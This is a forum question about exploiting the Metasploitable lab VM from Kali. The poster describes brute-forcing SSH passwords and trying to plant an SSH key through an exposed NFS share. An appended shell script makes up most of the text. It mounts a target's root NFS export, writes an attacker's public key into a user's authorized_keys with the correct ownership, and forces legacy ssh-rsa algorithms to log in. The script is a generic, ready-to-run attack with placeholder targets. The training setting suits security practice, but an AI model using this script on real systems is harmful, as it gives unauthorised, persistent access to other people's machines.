Apologies if the question is really simple, however I have not been able to find a solution yet.
I am exploring the exploitation potential of Kali Linux on the popular Metasploitable vulnerable server. This is done through connecting the two via a NAT Network in Virtualbox.
I have completed a Nessus scan and it revealed that the Metasploitable machine is vulnerable to NFS mounting exploits. I researched this further and it seemed like an easy way to gain password-less access via SSH.
I have already gained access through SSH by brute-forcing the password to three accounts (user, postgres and msfadmin); however, I wanted to go a step further and understand how NFS can lead to vulnerabilities.
I followed the steps in this tutorial: https://www.youtube.com/watch?v=i0_t3zl_X_E
I used ssh-keygen to generate a new RSA key:
I copied the RSA key into Metasploitable's authorized_keys file
I verified that the new key was added on the metasploitable side:
Now I should (according to the video) be able to login via ssh using ssh [email protected] after unmounting the file
I get the following error:
I have researched why this may be happening, and one answer I found was to do with file permissions, or using the command setsebool -P use_nfs_home_dirs 1
I tried using chmod to change the permissions, but this did not work and ended up breaking the VM at some point (which goes to show my lack of understanding, but trying all the different chmod options without a clue as to which one will work might take a long time).
setsebool didn't work either, as I couldn't install the package it was in using apt-get install policycoreutils (404 error, try using apt-get update or --fix-missing).
However, clearly I am able to SSH into the system through the use of the cracked passwords, although I still get the same error UNTIL I use the flag -oHostKeyAlgorithms=+ssh-rsa. Note that this does not work when added to ssh [email protected], only when using ssh -oHostKeyAlgorithms+=ssh-rsa [email protected]
Essentially, I want to know why SSH can't recognise that my public key is already in the authorized_keys file.
Many thanks to anyone able to point me in the right direction.
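The procedure the question describes (mount the NFS export, plant a public key, then log in with a legacy-tolerant client), as an added shell example; this is not code from the post or the linked video. It assumes GNU coreutils (stat -c), an OpenSSH client of 8.5 or newer on the attacker box (older clients spell the second option PubkeyAcceptedKeyTypes), and that the target exports its root filesystem over NFS without root squashing, so a root mount on the attacker can write into /home. TARGET, USER and the key paths are placeholders. The first function reproduces the ownership and mode checks sshd applies under StrictModes before it will read authorized_keys at all, which is the "file permissions" lead mentioned above, and is the part a practitioner would run before touching anything with chmod.

```shell
#!/bin/sh
# Added example, not the original poster's code.
# Assumptions: GNU stat, OpenSSH client >= 8.5, NFS export of / that a
# root mount on this host can write to. TARGET/USER/keys are placeholders.

# check_authorized_keys_perms HOME_DIR USER
# Mirrors sshd's StrictModes checks (on by default): the home directory,
# ~/.ssh and authorized_keys must exist, be owned by USER or root, and must
# not be group- or world-writable. Prints the first failure; 0 on success.
check_authorized_keys_perms() {
    home="$1"
    user="$2"
    for p in "$home" "$home/.ssh" "$home/.ssh/authorized_keys"; do
        if [ ! -e "$p" ]; then
            echo "missing: $p"
            return 1
        fi
        owner=$(stat -c '%U' "$p")
        if [ "$owner" != "$user" ] && [ "$owner" != root ]; then
            echo "wrong owner '$owner' on $p"
            return 1
        fi
        mode=$(stat -c '%a' "$p")
        # Octal digits 2,3,6,7 carry the write bit; the last two digits of
        # the mode are the group and other classes.
        case "$mode" in
            *[2367]?|*[2367])
                echo "group/world-writable mode $mode on $p"
                return 1
                ;;
        esac
    done
    return 0
}

# plant_key_via_nfs TARGET USER PUBKEY_FILE   (run as root)
# Mount the target's root export, append our public key to USER's
# authorized_keys and set exactly the ownership/modes sshd expects.
plant_key_via_nfs() {
    target="$1"
    user="$2"
    pub="$3"
    mnt=$(mktemp -d)
    mount -t nfs "$target:/" "$mnt"
    h="$mnt/home/$user"
    # uid:gid must come from the *target's* passwd file; the attacker box
    # may not have this user at all.
    ids=$(awk -F: -v u="$user" '$1 == u { print $3 ":" $4 }' "$mnt/etc/passwd")
    if [ -z "$ids" ]; then
        echo "no user '$user' in target passwd"
        umount "$mnt"; rmdir "$mnt"
        return 1
    fi
    mkdir -p "$h/.ssh"
    cat "$pub" >> "$h/.ssh/authorized_keys"
    chown "$ids" "$h/.ssh" "$h/.ssh/authorized_keys"
    chmod 700 "$h/.ssh"
    chmod 600 "$h/.ssh/authorized_keys"
    chmod 755 "$h"          # never recurse or loosen further than this
    umount "$mnt"
    rmdir "$mnt"
}

# ssh_legacy_rsa TARGET USER PRIVKEY_FILE
# A server that only speaks ssh-rsa (SHA-1) signatures is refused by an
# OpenSSH 8.8+ client at two points: the host key exchange and the user-key
# signature. HostKeyAlgorithms alone gets past the first; without
# PubkeyAcceptedAlgorithms the client silently never offers the planted
# RSA key and falls through to password authentication.
ssh_legacy_rsa() {
    ssh -i "$3" \
        -o HostKeyAlgorithms=+ssh-rsa \
        -o PubkeyAcceptedAlgorithms=+ssh-rsa \
        "$2@$1"
}
```

Run check_authorized_keys_perms against the mounted home directory before and after planting the key; adding -v to the ssh call shows whether the client ever prints "Offering public key" for the planted key, which separates a client-side algorithm refusal from a server-side permissions rejection.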